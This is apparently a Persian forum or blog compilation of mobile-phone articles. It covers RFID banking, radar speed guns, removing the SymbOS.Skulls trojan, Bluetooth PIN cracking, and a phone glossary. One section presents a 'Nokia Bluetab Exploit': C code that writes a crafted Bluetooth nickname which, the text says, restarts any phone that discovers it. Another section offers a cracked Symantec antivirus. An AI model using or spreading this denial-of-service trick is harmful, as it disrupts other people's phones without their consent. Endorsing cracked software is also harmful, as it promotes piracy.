در اين بخش سعي ميكنم كه مطالب آموزشي بنويسم كه شايد بدردتون بخوره
در اين بخش سعي ميكنم كه مطالب آموزشي بنويسم كه شايد بدردتون بخوره
تشخيص هويت از طريق فركانسهاي راديويي (RFID)
![]()
استفاده از فناوري تشخيص هويت از طريق فركانسهاي راديويي يا تشخيص هويت بيومتريكي مانند اثر انگشت در بانكها سبب كاهش صفهاي طولاني بانكها و ارايه بهتر خدمات بانكي به مشتريان خواهد شد.
در پنج سال آينده بانكهاي اصلي دنيا ميتوانند اين فناوري را در شعبههاي خود به منظور صرفهجويي در زمان و ارايه خدمات مناسب به مشتريان به خدمت بگيرند.
بانكها در حال تلاش براي ايجاد تغييرات بنيادي و پايهاي در ساختار بانكي هستند و بنابراين روشهاي زيادي را براي استفاده از اين فناوري جديد آزمايش كردهاند.
تشخيص هويت از طريق فركانسهاي راديويي (RFID)، كه به تازگي توسط برخي شركتها، توسعه يافته است ميتواند در بانكها مورد استفاده قرار گيرد. مشتريان توسط كارتهاي RFID رمزدار در داخل كيفهاي پول خود هنگام ورود به بانك توسط دستگاه شناسايي ميشوند و اطلاعات شخصي آنها بلافاصله بر روي صفحه نمايش كامپيوتر ظاهر ميشود.
شماره مشتريان در همان لحظه ورود توسط دستگاه اعلام ميشود و دستگاه بدون طرح پرسشهاي اضافي و غير ضروري، تنها سوالات ضروري را از مشتريان خواهد پرسيد. يعني بانكها با در دست داشتن اطلاعات شخصي مشتري به سرعت ميتوانند امور بانكي مشتريان خود را انجام دهند.
فناوري RFID علاوه بر امور بانكي در پرداخت قبض تلفن، برق و آب و همچنين در كارتهاي هوشمند سوخت براي خودروها مورد استفاده قرار خواهند گرفت.
فناوري RFID و همچنين فناوري تشخيص هويت بيومتريك مانند اثر انگشت، شكل چشم، عصب، كف دست، بسامد صدا، نبض يا شكل گوشهاي افراد در پنج سال آينده در اكثر بانكهاي مهم و معتبر دنيا براي ارايه بهتر و سريعتر خدمات و همچنين كاهش و جلوگيري از جعل امضا و كلاهبرداري مورد استفاده قرار خواهد گرفت.
![]()
آموزش برنامه ایرانی رایگان Solar Data و توضیحاتی در مورد آن
پرشين بايت - ايمان قصر فخري ( نويسنده برنامه Solar Data) - آموزش برنامه Solar Data
مطالب زير طي نامه اي از طرف ايمان قصر فخري ( نويسنده برنامه Solar Data) براي مدير سايت پرشين بايت فرستاده شد.
اين برنامه مدتي پيش در سايت گذاشته شد.
اين برنامه براي نشان دادن تاريخ شمسي بر روي گوشي هايي كه اين امكان را ندارند ميتواند استفاده بشود. اما براي نشان دادن تاريخ شمسي اين برنامه بايد حتما اجرا بشود و اين امكان نيست كه هميشه تاريخ بر روي صفحه نمايان باشد شما براي گرفتن تاريخ شمسي حتما بايد برنامه را اجرا كنيد.
براي گوشي هايي كه OS دارند فقط كافي است كه اين برنامه را اجرا منيد و آن را در بخش Application نصب كنيد و براي گوشي هايي كه OS ندارند بايد از برنامه هاي مخصوص نصب استفاده كرد مثلا براي گوشي نوكيا 7200 بايد از نرم افزار Nokia PC Suite استفاده كرد ولي براي گوشي هايي مثل نوكيا ۶۶۰۰ و زيمنس CX65 و سوني اريكسون k300 فقط كافيست بر روي فايل را اجرا كنيد و پيغام نصب را تائيد كنيد.
البته اين نرم افزار ايراداتي كوچيك هم دارد مثلا تا ساعت 3:30 صبح تاريخ روز قبل را نشان ميده و يا بر روي بعضي گوشي ها حروف روز هاي هفته را به خوبي نشان نميده.
قول ميدم نسخه اصلاح شده اش را در اولين فرصت ارائه كنم
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]![]()
نوکیا ترفند برگه آبی
- ابتدا یک فایل به نام bluetab.txt درست کنید با bluetooth nickname تون بعد این فایل را به گوشی نوکیا خود ببرید بعد این فایل را باز کنید و nickname را در قسمت bluetooth nickname موبایل خود کپی کنید.
- حالا اگر کسی جستجو کند و nickname شما را پیدا کند گوشی اش رستارت میشه.
- این ترفند روی بسیاری از گوشی های سیمبیان دیگر و گوشی هایی که جاوا دارند کار میکند.
*/
#include <stdio.h>
#define tab1 0x09
#define tab2 0x2E
#define dot1 0x0A
int main(int argc,char *argv[])
{
FILE *bluetab;
if(argc < 2)
{
msgm();
printf("Useage : ./bluetab <nickname>\n");
return 0;
}
else
{
msgm();
printf("bluetab.txt file created with your nickname . \n");
}
bluetab = fopen("bluetab.txt","w");
if(!bluetab)
{
msgm();
printf("Some kind of file error!\n");
return 0;
}
fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);
fclose(bluetab);
return 0;
}
msgm()
{
printf(" ------------------------------- \n");
printf(" Nokia Bluetab Exploit \n");
printf(" OOOOOOOOOOO \n");
printf(" DDDDDDDDDDDD \n");
printf(" ------------------------------- \n\n");
}
![]()
شكار با اسلحه سرعت - رادارها چگونه كار ميكنند
ماهنامه دنیای مخابرات و ارتباطات - شروین هادی نژاد - رادارها از جمله تجهيزاتي هستند كه كاربردهاي متنوع و مختلفي دارند. مثلا كاربران نظامي يا كاربران كنترل ترافيك هوايي از آن براي كنترل و هدايت مسير هواپيماها روي زمين و يا در آسمان استفاده ميكنند، ايستگاههاي هواشناسي از رادارها جهت پيگرد و شناسايي مسير حركت ابرها و توفانها يا گردبادهاي مختلف استفاده ميكنند.
حتي انواع سادهتري نيز وجود دارند كه شايد تا به حال به آنها توجهي نكردهايم، براي مثال در بازكنهاي خودكار (با نزديك شدن انسان يا اجسام به در، آنها خود به خود گشوده ميشوند) از اين جمله و نوعي از رادارها هستند، بنابراين امروزه رادارها يك فناوري بسيار كارآمد محسوب ميشوند. اين تجهيزات معمولا براي سه منظور به كار ميروند كه عبارتند از:
- تعيين فاصله نسبت به يك جسم يا اجسام: معمولا براي اجسامي كه در حركت هستند مانند هواپيماها، كشتيها، قايقها و... اين نوع از رادارها ميتوانند ساده يا بسيار پيشرفته باشند كه انواع پيشرفته حتي ميتوانند براي مثال، نوع و مدل هواپيما را نيز شناسايي كنند.
- تعيين سرعت يك جسم متحرك
- جهت تهيه نقشه: سفينههاي فضايي و ماهوارهها معمولا از اين نوع رادارها جهت تهيه نقشههاي سه بعدي از سطح سيارات و كرات ديگر استفاده ميكنند.
رادارها براي انجام موارد ياد شده از فنون مربوط به انتشار و انعكاس امواج راديويي بهره ميبرند.
پژواك يا انعكاس صدا:
اين ويژگي است كه همه شما تا به حال آن را آزمودهايد، بر اين اساس اگر كسي در يك دالان و يا يك چاه فرياد بكشد طنين صداي خود را با تاخير چند لحظهاي دوباره خواهد شنيد. پژواك صدا هنگامي روي ميدهد كه امواج صوت پس از برخورد به سطوح مختلف دوباره انعكاس مييابند و به سمت فرستنده بازميگردند. فاصله زماني ميان ارسال صدا و دريافت مجدد آن، وابسته به ميزان مسافت بين فرستنده امواج و سطح منعكس كننده آنها است. رادارها نيز به كمك ارسال امواج راديويي و دريافت امواج بازتابيده يا منعكس شده از طرف اجسام قادرند تا فاصله و سرعت حركت اجسام را برآورد و تعيين كنند.
اين شيوه در زير آب براي زيردرياييها و خارج از آب و در هوا براي ديگر تجهيزات كاربرد دارد كه البته رادارهاي صوتي كه خارج از آب به كار ميروند چند مشكل دارند كه به شرح زير است:
- امواج صوتي، از آنجا كه قابليت شنيده شدن را دارند، ممكن است صداهاي ناشي از يك رادار صوتي، براي شما و يا همسايگان اطراف، آزاردهنده و نامطلوب باشند.
- امواج صوتي بازتابيده شده بسيار ضعيف هستند و تشخيص آنها به سختي صورت ميگيرد.
- عدم توانايي در ارسال امواج صوتي تا مسافتهاي دور.
البته بسيار يا بهتر بگوييم كه تمامي مشكلهاي ياد شده با استفاده از رادارهاي فراصوتي به جاي رادارهاي صوتي قابل برطرف شدن است. بر اين اساس رادارها از امواج راديويي به جاي امواج صوتي استفاده ميكنند. اين امواج تا مسافتهاي بيشتري ارسال ميشوند، نامرئي بوده و حتي در صورتي كه ضعيف باشند نيز به راحتي قابل تشخيص و دريافت خواهند بود.
با نگاهي به عملكرد يك رادار كنترل هوايي با ساختار اين تجهيزات بيشتر آشنا ميشويم. راداري كه براي كنترل هواپيماها در هوا به كار گرفته ميشود، قادر است تا امواج راديويي با فركانس بالا را با توان زياد به صورت هر يك ميليونيم ثانيه يك بار، ارسال كند. به بيان ديگر هر فرستنده و گيرنده رادار، هر ثانيه را به يك ميليون بخش تقسيم كرده و در هر بخش به طور متناوب يك قسمت ارسال و يك قسمت دريافت انجام ميدهند. به طوري كه در زمان قطع ارسال (هنگام دريافت) منتظر شنيدن امواج برگشتي ميماند. با توجه به سرعت انتشار امواج راديويي كه برابر سرعت انتشار نور است، رادارها قادرند تا براساس اختلاف زمان ميان ارسال و دريافت مجدد انعكاس امواج، فاصله و سرعت هواپيماها را دقيقا برآورد كنند.
جالب توجه است كه در رادارهاي مخصوص كنترل زميني، تداخل بيشتري نسبت به رادارهاي هوايي به وجود ميآيد چرا كه در مسير امواج اين نوع از رادارها اجسام بيشتري از قبيل كوهها، درختان، ساختمانها و پلها و... وجود دارند.
رادارهاي رديابي سرعت چگونه كار ميكنند؟
اين روزها همه ما شاهد تخلفات مختلف رانندگي و از جمله سرعت غيرمجاز و بسيار زياد در بزرگراههاي شهر هستيم به طوري كه "سرعت غيرمجاز" ديگر به شكل يك قانونشكني عادي و روزمره درآمده است. در اين حال نيروهاي پليس و كنترل ترافيك در سراسر دنيا، براي مقابله و برخورد با تخلفات سرعت غيرمجاز خودروها، از نوعي از رادارها كه به آنها رادارهاي رديابي گفته ميشود استفاده ميكنند:
براي آشنايي با چگونگي كاركرد رادارهاي ردياب، ابتدا بايد بدانيم كه آنها قرار است چه چيزي را رديابي كنند؟
اين تجهيزات بيشتر جهت كشف و اندازهگيري مقدار سرعت وسايل نقليه به كار ميروند، كه به اصطلاح "اسلحه سرعت" نيز ناميده ميشوند. اين وسايل چيزي نيستند جز يك فرستنده و گيرنده راديويي كه در قالب يك دستگاه واحد عرضه شدهاند. فرستنده راديويي موجود در اين تجهيزات، با ايجاد نوسان، امواج الكترومغناطيسي را روي بسامدهاي مشخصي منتشر ميكند. همچنين در مدار فرستنده يك تقويت كننده امواج نيز تعبين شده است تا قدرت ارسال دستگاه بيشتر شود.
اما بخش گيرنده اين دستگاه درست معكوس قسمت فرستنده عمل ميكند، يعني امواج الكترومغناطيسي را پس از دريافت از طريق آنتن، به جريان الكتريسيته تبديل ميكند. همان طور كه اشاره شد، رادارها از امواج راديويي براي شناسايي و تغيير حالتهاي اجسام گوناگون استفاده ميكنند به طوري كه در زماني كه امواج راديويي را در جهت يا جهاتي منتشر ميكنند، گيرنده آنها منتظر دريافت امواج بازتابيده (منعكس شده) از طرف اجسامي است كه در مسير سيگنالهاي ارسالي قرار دارند. امواج راديويي در هوا با سرعت مشخصي حركت ميكنند، بنابراين دستگاههاي رادار با محاسبه فاصله زماني ميان ارسال تا دريافت امواج بازتابيده قادرند تا فاصله جسم و سرعت و حتي جهت حركت آن را آشكار سازند.
فرآيند محاسبه سرعت اجسام بر اين اساس انجام ميگيرد كه اگر جسمي نسبت به رادار ثابت باشد، امواج ارسالي از رادار پس از برخورد به آن با حفظ مشخصات سيگنال ارسالي به رادار منعكس و منتقل ميشوند ولي اگر جسم يا مثلا اتومبيل در حال حركت باشد، سگينال راديويي ارسال شده از رادار، بعد از برخورد با آن دچار دگرگوني و تغيير (پراكندگي) شده و هر قسمت از آن از جهت متفاوتي به سوي رادار بازخواهد گشت نه به صورت متمركز.
حال بر مبناي جهت حركت خودرو نسبت به موقعيت استقرار رادار، قسمتهاي مختلف سيگنالهاي بازتابيده به مرور ممكن است ديرتر و يا زودتر از قسمتهاي قبلي به رادار برگردند. براي مثال، در صورتي كه يك خودرو در حال حركت بوده و جهت حركت آن طوري است كه هرچه پيش ميرود از رادار دورتر ميشود، در اين حالت رادار سيگنالها را در هر لحظه با تاخير بيشتري نسبت به قبل دريافت ميكند و بالعكس در صورتي كه خودرو به سمت رادار حركت كند و به آن نزديك شود سگينالها به مرور با تاخير كمتري به گيرنده منعكس ميشوند، زيرا در هر لحظه از فاصله ميان خودرو و رادار كاسته ميشود. در نتيجه دستگاههاي "اسلحه سرعت" با محاسبه و بررسي تغييرات سگينالهاي دريافتي قادرند تا ميزان سرعت و جهت اجسام متحرك و خودروها را تخمين زده و تعيين كنند.
نكته مهم آن كه اگر يك "اسلحه راداري" از درون يك خودرو كه خود در حال حركت بوده و براي مثال سرعت آن 50 كيلومتر در ساعت است، مورد استفاده قرار گيرد، هنگامي كه بخواهيم سرعت يك خودرو را كه در جهت مخالف حركت ميكند محاسبه كنيم، آشكار ساز رادار پس از هدفگيري سرعت آن را 20 كيلومتر در ساعت تعيين ميكند اما حقيقت آن است كه در چنين شرايطي سرعت خودروي مقابل 70 كيلومتر در ساعت است.
اخيرا نوع جديدي از اين نوع رادارها توسط پليس به كار ميروند كه با امواج نوري كار ميكنند، اين گونه وسايل كه به نام "اسلحه سرعت ليزري" شناخته ميشوند امروزه كاربرد وسيعي دارند.
اساس كار در رادارهاي ليزري به اينگونه است كه دستگاه با ارسال پرتوي ليزري مادون قرمز هنگام عبور يك وسيله نقليه از جاده فاصله زماني قطع و وصل شدن مسير پرتو كه به علت عبور خودرو انجام ميگيرد را سنجيده و سرعت آن را تخمين ميزند. اين تجهيزات هم به صورت دستي ميتوانند مورد استفاده قرار گيرند و هم به طور ثابت نصب و سرعت خودروهاي عبوري را به صورت خودكار ثبت و ضبط كنند. در اين حالت دستگاه براساس برنامهريزي قبلي، ميتواند طوري تنظيم شود كه هنگام عبور خودروهايي با سرعت بيش از حد مجاز تعيين شده، دوربين تعبيه شده در سيستم از آن (شماره پلاك و چهره راننده) يك عكس تهيه كرده و آن را به مركز كنترل پليس ارسال كند.
![]()
استفاده از فايل UD - symantec - by.gph - 1-11-2005 براي به روز رساني آنتي ويروس symantec :
شما با استفاده از این فایل آپدیت آنتی ویروس خود را تا این تاریخ 1-11-2005 به روز کرده اید
![]()
![]()
![]()
برای استفاده میبایستی قبل از این که این فایل را بر روی موبایل خود اجرا کنید آنتی ویروس symantec را خاموش کنید و بعد از ریختن فایل آن را روشن کنید.
خود آنتی ویروس symantec هم نیز در سایت برای دانلود است فکر کنم این دومین فایل است که در لیست دانلود سایت است و کامل کرک نشده این برنامه جوری دستکاری شده و کرک شده که تا سال ۲۰۰۷ کار میکند و نیازی به رجیستر شدن ندارد.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
نحوه پاك كردن اسب تروا SymbOS.Skulls.R از روي موبايل
درباره اين اسب تروا :
اين اسب تروا بر روي تمام گوشي هايي كه از سيستم عامل سيمبيان استفاده ميكنند قابليت اجرا دارد و به همراه اجراي خود بر روي گوشي تعدادي ويروس را هم نيز با خود بر روي گوشي نصب ميكند.
![]()
نحوه حذف و از بين بردن اين اسب تروا :
ابتدا برنامه فايل منيجر را در موبايل خود باز كنيد و سپس در قسمت option نمايش فايل هاي موجود در فولدر سيستم را فعال كنيد.
سپس فايل هايي كه در زير آمده است از روي موبايل خود حذف كنيد :
!:\System\apps\BtUi\BTUI.R01
!:\System\apps\BtUi\BTUI.R13
!:\System\apps\BtUi\BTUI.aif
!:\System\apps\BtUi\BTUI_CAPTION.R13
!:\System\apps\BtUi\BTUI_CAPTION.r01
!:\System\apps\BtUi\BtUi.app
!:\System\apps\Camcoder\Camcoder.aif
!:\System\apps\Camcoder\Camcoder.app
!:\System\apps\Camcoder\Camcoder.rsc
!:\System\apps\Camcoder\Camcoder_CAPTION.rsC
!:\System\apps\Camcoder\flo.mdl
!:\System\apps\FExplorer\FExplorer.aif
!:\System\apps\FExplorer\FExplorer.app
!:\System\apps\FExplorer\FExplorer.rsc
!:\System\apps\FExplorer\FExplorer_CAPTION.rsC
!:\System\apps\FExplorer\flo.mdl
!:\System\apps\File\File.aif
!:\System\apps\File\File.app
!:\System\apps\File\File.rsc
!:\System\apps\File\File_CAPTION.rsC
!:\System\apps\File\flo.mdl
!:\System\apps\FREAKBtUi\FREAKBtUi.R01
!:\System\apps\FREAKBtUi\FREAKBtUi.R13
!:\System\apps\FREAKBtUi\FREAKBtUi.aif
!:\System\apps\FREAKBtUi\FREAKBtUi.app
!:\System\apps\FREAKBtUi\FREAKBtUi_CAPTION.R13
!:\System\apps\FREAKBtUi\FREAKBtUi_CAPTION.r01
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook.APP
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook.R01
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook.R13
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook.aif
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook_CAPTI ON.R13
!:\System\apps\FREAKPhoneBook\FREAKPhoneBook_CAPTI ON.r01
!:\System\apps\iLoveU\flo.mdl
!:\System\apps\iLoveU\iLoveU.aif
!:\System\apps\iLoveU\iLoveU.app
!:\System\apps\iLoveU\iLoveU.rsc
!:\System\apps\iLoveU\iLoveU_CAPTION.rsC
!:\System\apps\MCE\mce.aif
!:\System\apps\MCE\mce.app
!:\System\apps\MCE\MCE.R01
!:\System\apps\MCE\MCE.R13
!:\System\apps\MCE\mce_CAPTION.r01
!:\System\apps\MCE\MCE_CAPTION.R13
!:\System\apps\PhoneBook\PhoneBook.R01
!:\System\apps\PhoneBook\PhoneBook.R13
!:\System\apps\PhoneBook\PhoneBook.aif
!:\System\apps\PhoneBook\PhoneBook_CAPTION.R13
!:\System\apps\PhoneBook\PhoneBook_CAPTION.r01
!:\System\apps\PhoneBook\Phonebook.app
!:\System\apps\SmartFileMan\SmartFileMan.aif
!:\System\apps\SmartFileMan\SmartFileMan.app
!:\System\apps\SmartFileMan\SmartFileMan.rsc
!:\System\apps\SmartFileMan\SmartFileMan_CAPTION.r sC
!:\System\apps\SmartFileMan\flo.mdl
!:\System\apps\SmartMovie\SmartMovie.aif
!:\System\apps\SmartMovie\SmartMovie.app
!:\System\apps\SmartMovie\SmartMovie.rsc
!:\System\apps\SmartMovie\SmartMovie_CAPTION.rsC
!:\System\apps\SmartMovie\flo.mdl
!:\System\apps\SystemExplorer\SystemExplorer.aif
!:\System\apps\SystemExplorer\SystemExplorer.app
!:\System\apps\SystemExplorer\SystemExplorer.rsc
!:\System\apps\SystemExplorer\SystemExplorer_CAPTI ON.rsC
!:\System\apps\SystemExplorer\flo.mdl
!:\System\apps\UltraMP3\UltraMP3.aif
!:\System\apps\UltraMP3\UltraMP3.app
!:\System\apps\UltraMP3\UltraMP3.rsc
!:\System\apps\UltraMP3\UltraMP3_CAPTION.rsC
!:\System\apps\UltraMP3\flo.mdl
!:\System\install\autoexecdaemon.SIS
و سپس از برنامه فايل منيجر خارج شويد
![]()
بلوتوث Bluetooth
پي سي ورد - Bluetooth 1. چيست؟ بلوتوس ابتدا در آمريكا مورد توجه قرار نگرفت ولي بتدريج متداول شد،بلوتوس در نوت بوك ها و PDA مخصوص در تلفن هاي همراه اين امكان را مي دهد كه بدون سيم حجم كوچكي از اطلاعات را در فاصله كوتاهي رد و بدل كند، بلوتوس در حال رقابت با يك تكنولوژي بيسيم جديد به اسم Ultra widedand يا Uwb است،كه Data را با سرعت 980 مگابايت حمل مي كند در حالي كه بلوتوس سرعتي با 721 كيلو بايت در ثانيه دارد.
2. چه كسي Bluetooth تلفن شما را كنترل مي كند؟
محققان روش جديدي را ابداء كردند كه مي تواند به مبايل شما حمله كنند حتي اگر نرم افزارهاي امنيتي مبايل شما روشن باشد.اجراي اين تكنيك شبيه تكنيكي هست كه سال پيش توسط يك شركت امنيتي به نام oil white house توزيع شد. اين تكنيك به attacker اجازه مي دهد كه به بلتوس يك تلفن وصل شود و بدون اجازه خواستن در هنگامي كه ارتباط برقرار مي شود حمله كننده مي تواندتلفن شما را هدف قرار دهد و به اطلاعات مبايل شما دسترسي داشته باشد و حتي اگر شخص مبايل خودش را به يك Device ديگر وصل كند شخص حمله كننده بر اطلاعات رد و بدل شده كنترل كامل خواهد داشت. روش اصلي و معمول براي وصل شدن به يك Device از حمله كننده استفاده از يك Pin كه مي خواهد كه باعث زوج شدن دو دستگاه شود، مي باشد. روش هاي قبلي مدتي طول مي كشد كه حمله كننده بتواند Device pin هدف را پيدا كند كه اين زمان بسته به تعداد كراكتري كه شخص به عنوان Pin تعيين كرده متغير است. ولي روش جديد اجرا شده فقط 6 % تا 3 % ثانيه براي 4 تا digit طول مي كشد.
3- while house به دارندگان تلفن همراه توصيه مي كند يك چيت با حداكثر تعداد كراكتر انتخاب كنند مثلا بر اساس اين روش جديد يك pin 6 رقمي كه فقط 10 ثانيه براي حمله كننده زمان طول مي كشد كه آن را crack كند ولي يك 10 رقمي شايد يك هفته طول بكشد تا بشه ان را پيدا كرد. ولي شايد بعضي از تلفن ها اجازه انتخاب بيشتر از 4 رقم را به user ندهند![]()
نکاتی که قبل از خرید موبایل باید بدانید
در ايـن مـقـالـه سعي مي كنيم شـمـا را بـــا اصطلاحات و واژه نامه تـلـفن هـمـراه و لـوازم جانـبــي آن آشنا ميكنيم تاهـنـگـام خـريـد و استـفـاده از تـلـفن هـــمراه دچارسردرگمي نگرديد.
ابتدا با تكنولوژيهاي شبكه تلفن همراه و همچنين نسلهاي تلفن همراه آشنا شويد:
*FDMA:درايـن تكـنـولوژي براي هر تلفن همراه يك فركانس مجزا تعلق ميگيرد.
* TDMA : اين تكنولوژي ديجـيـتـالـي تماس هـاي تـلـفـني را در قــالب بـــسته هايي از داده بر طبق زمان تقسيم بندي ميكند.
* CDMA: اين تكنولوژي ما را قادر ميسازد حجم بالايي از داده و صوت را توسط يك فركانس يكسان همزمان مخابره كنيم.
نسلهاي تلفن همراه
*1G: نسل اول كه تلفنهاي همراه آنالوگ را تشكيل ميدادند.
*2G: نسل دوم تلفنهاي همراهي كه از سيستم ديجيتالي بهره ميگيرند.
*3G: نسل سوم تلفنهاي همراه كه انتقال داده ها در آن باسرعت بالا (تا 2 مگابايت در ثانيه) صورت ميگيرد.
*4G:نسل چهارم تلفنهاي همراه كه در آن انتقال داده ها با سرعت 20 مگابايت در ثانيه امكان پذير بوده و براي مشاهده برنامه هاي تلويزيوني مناسب ميباشد. پيش بيني ميگردد كه اين نسل از تلفن همراه از سال آينده و يا حداكثر تا سال 2010 ميلادي به بازار عرضه گردد.
DUAL BAND (باند دوگانه) چيست؟ به قابليت تلفن همراه در تغيير فركانسهاي ارتباطي اطلاق ميگردد. به اين معني كه قادر است از فركانسهاي ديجيتالي 800MHZ و هم 1900MHZ براي ارسال و دريافت تماس استفاده كند.
TRI BAND (باند سه گانه) چيست؟ تلفن همراهي كه قادر است هر فركانس ديجيتالي را پشتيباني كند.
DUAL MODE (حالت دوگانه) چيست؟ به تلفنهاي همراهي كه قادر ميباشند هم از سيستم ديجيتال و هم سيستم آنالوگ استفاده كنند اطلاق ميگردد.
* CARRIER: به كمپاني تامين كننده سرويسهاي ارتباطات راه دور بي سيم كرير ميگويند. يا همان اپراتورتلفن همراه.
*NETWORK: شبكه فرستنده امواج مخابراتي تلفن همراه.
* SERVICE PLAN (نوع خدمات): نوع سرويسي كه مخابرات به كاربران تلفن همراه ارائه ميدهد مانند: عدم نمايش شماره تلفن، ارسال پيام كوتاه، ويدئو كنفرانس و غيره.
*SERVICE AREA=COVERAGE: محدوده هاي جغرافيايي تحت پوشش اپراتور تلفن همراه.
* GSM (سيستم جهاني ارتباطات تلفن همراه): استاندارد جهاني ارتباطات ديجيتالي تلفن همراه كه در 60 كشور جهان مورد استفاده قرار ميگيرد. چهار فركانس متداول در اين استاندارد عبارتند از:850mhz-900mhz-1800mhz-1900mhz.
* UMTS: سر نام كلمات"سيستم جهاني ارتباطات راه دور تلفن همراه" ميباشد. اين اصطلاح مترادف نسل
سوم تلفنهاي همراه ميباشد.
* GPRS (سرويس بسته هاي امواج راديويي): اين تكنولوژي امكان انتقال حجم و سرعت بالاي داده را فراهم ميآورد.
* SIM (ماژول شناسايي مشترك): (سيم كارت) كارت پلاستيكي كوچك و قابل حمل كه اطلاعات مربوط به شماره تلفن مشترك،اطلاعات كاربر،دفترچه تلفن كاربر و.. را در خود ذخيره ميكند.
كدهاي تلفن همراه
* SECURITY CODE (كد ايمني): يك كد 5 رقمي كه از استفاده غير مجاز تلفن جلوگيري به عمل مي آورد.
* PIN (كد شناسايي شخصي): يك كد چند رقمي ميباشد كه از سيم كارت شما در مقابل استفاده غير مجاز محافظت ميكند.
* PUK (كد سد شكن شخصي): يك كد معمولا 8 رقمي ميباشد كه براي تغيير كد سد كننده PIN مورد نياز ميباشد.
* GLOBAL ROAMING (رومينگ): قابليت برقراري و دريافت تماس تلفني و يا ارسال و دريافت SMS با همان سيم كارت عادي خودتان در خارج از كشور.
* ERI: آيكوني است روي صفحه نمايش تلفن همراه كه فعال و يا غير فعال بودن حالت رومينگ را نشان ميدهد.
* SATELITE PHONE (تلفن ماهواره اي): سيم كارتي است كه تلفنهاي همراه را توسط شبكه هاي ماهواره اي به يكديگر مرتبط ميسازد.
* PRE-PAID CARD (سيم كارت اعتباري): سيم كارتي است كه از آن به ميزان زمان (دقيقه )از پيش تعيين شده اي ميتوانيد بهره برداري كنيد.
انواع باطري قابل شارژ تلفن همراه
* NICD (نيكل-كادميوم): مدل قديمي باطريهاي قابل شارژ ميباشند. در صورتي كه پيش از خالي شدن كامل اقدام به شارژ مجدد آنها كنيم آسيب ميبينند.
* NIMH (نيكل-فلز هيدروژن دار): ظرفيت آن از نوع قبلي بالا تر ميباشد.
* LI-ON (يون ليتيوم): اين نوع باطري از انواع مذكور كم حجم تر، سبك تر و گرانقيمت تر ميباشد. عمر آن نيز طولانيتر بوده و از لحاظ زيست محيطي نيز آلايندگي كمتري دارد.
انواع شارژر تلفن همراه
* AC CHARGE (شارژر برق شهري): شارژر معمولي تلفنهاي همراه.
* RAPID CHARGER (شارژر سريع): شارژري كه قادر است باطري تلفن همراه را ظرف مدت 4 ساعت شارژ كند.
* CAR CHARGER (شارژر خودرو): شارژري كه با اتصال به فندك خودرو باطري تلفن همراه را شارژ ميكند.
* BUILT-IN CHARGER (شارژرداخلي): شارژري است كه درون خود تلفن همراه تعبيه ميگردد و به شما امكان ميدهد تلفن را بمنظور شارژ مستقيما به برق شهري متصل سازيد.
اصطلاحات مرتبط با باطري تلفن همراه
* BATTERY CAPACITY (ظرفيت باطري): ظرفيت باطري بصورت ميلي آمپر در ساعت (MAH) اندازه گيري ميشود.
* BATTERY INDICATOR (شاخص باطري): آيكوني است كه ميزان شارژ باطري را به شما نشان ميدهد.
* BATTERY EMPTY: اخطار خالي شدن شارژ باطري.
* TALK TIME (زمان مكالمه): مدت زماني است كه باطري طي برقرار بودن تماس شارژ باقي ميماند.
* STANDBY TIME (زمان حالت انتظار): مدت زماني است كه باطري طي روشن بودن تلفن اما غير فعال بودن آن شارژ باقي ميماند.
چند نكته در رابطه با باطري تلفن همراه
1-هرگز از باتري فرسوده و يا دستگاه شارژ كننده معيوب استفاده نكنيد.
2-باتري را در دماي بين 15 تا 25 درجه سانتي گراد نگهداري كنيد.
3-باتري را در آتش نياندازيد.
4- تنها از باتري و شارژ كننده هاي مورد تائيد توليد كننده استفاده نماييد
5- تلفن همراه را بيش از يك بار در هفته به شارژر متصل نكنيد چرا كه شارژ بيش از حد عمر باتري را كوتاه ميكند.
انواع تلفن همرا از لحاظ شكل ظاهري
* FLIP-OPEN (تا شونده): اين نوع تلفنها داراي دو بخش ميباشند كه توسط يك لولا روي يكديگر تا ميگردند.
* SLIDE (كشويي): اين نوع تلفنهاي همراه داراي يك بخش فوقاني بوده كه روي بخش زيرين و اصلي بصورت كشويي قابل حركت ميباشد
* STANDARD (استاندارد): نوع معمولي تلفنهاي همراه ميباشد.
اصطلاحات صفحه نمايش تلفنهاي همراه
* LCD (كريستال مايع): صفحه نمايش رايج تلفنهاي همراه كه از دو ماده پلاريزه و كريستال مايع ميان آنها تشكيل يافته است.
* MONOCHROME LCD (ال سي دي تك رنگ): نوع سياه و سفيد ال سي دي ميباشد.
* COLOR LCD (ال سي دي رنگي): ال سي دي هاي رنگي به چند نوع STN-TFD-TFT تقسيم بندي ميگردند . نوع TFT وضوح بالاتر و ضخامت كمتري داشته اما گرانقيمت است.نوع STN ارزان قيمت بوده ولي وضوح TFT را ندارد.نوعTFD ارزان بوده و از و ضوح TFT را نيز برخوردار ميباشد.
* TOUCH SCREEN (صفحه حساس به لمس): در اين نوع صفحه نمايش قادر خواهيد بودد توسط قلم ديجيتالي اقدام به نوشتن و يا جستجو در منو كنيد.
* STYLUS= DIGITAL PEN (قلم ديجيتالي):< /STRONG> قلم ويژه وارد كردن اطلاعات به صفحه نمايش تلفن همراه.
* BACKLIT ILLUMINATION (روشن سازي): قابليتي در تلفنهاي همراه كه با تابش نور از سمت عقب سبب روشن گشتن صفحه نمايش و يا صفحه شماره گير ميگردد.(بمنظور ديد بهتر در تاريكي)
اصطلا حات عمومي تلفن همراه :
* BANDWIDTH (پهناي باند): به ميزان معيني داده كه ميتواند در مقطع ثابتي از زمان منتقل گردد پهناي باند ميگويند.بصورت بيت و يا بايت در ثانيه(BPS) و يا بسامد در ثانيه (Hertz) نشان داده ميگردد .
* KEYPAD (صفحه شماره گير): صفحه كليد تلفن همراه.
* ANTENNA (آنتن): آنتن بخشي از تلفن همراه است كه فركانسهاي مخابره شده را دريافت و يا ارسال ميكند.
* AIR TIME (زمان تماس): ميزان زماني است كه صرف مكالمه با تلفن همراه ميگردد.هم تماسهاي ارسالي و هم دريافتي.
* SIGNAL STRENTH METER (سيگنال سنج): آيكوني در تلفن همراه كه ميزان توان نسبي سيگنال دريافتي را نشان ميدهد.
